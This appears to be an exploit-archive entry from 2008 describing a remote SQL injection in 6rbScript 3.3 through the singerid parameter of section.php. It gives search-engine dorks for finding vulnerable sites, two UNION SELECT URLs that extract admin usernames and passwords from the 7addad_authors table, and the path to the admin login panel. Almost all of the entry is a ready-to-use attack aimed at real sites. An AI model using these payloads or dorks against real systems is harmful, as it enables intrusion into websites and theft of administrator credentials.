id: 3707
date: 09/20/2008
title: 6rbScript 3.3 (singerid) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

===========================================================
6rbScript 3.3 (singerid) Remote SQL Injection Vulnerability
===========================================================



|___________________________________________________|
|
| 6rbScript V3.3 (singerid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|___________________________________________________
|                                                   |
|
| script : www.6rbscript.com
|
| DorK   : inurl:"section.php?name=singers"
| dorK   : Powered By 6rbScript V3.3
|___________________________________________________|


Exploit:
________


user name
_______

www.[target].com/[PATS]/section.php?name=singers&f=songs&singerid=-1+union+select+1,aid,3,4,5,6+from+7addad_authors--


password
_______

http://localhost/Script/section.php?name=singers&f=songs&singerid=-1+union+select+1,pwd,3,4,5,6+from+7addad_authors--



Admin LogIn :

www.[target].com/cpanel.php



#  0day.today [2023-03-23]  #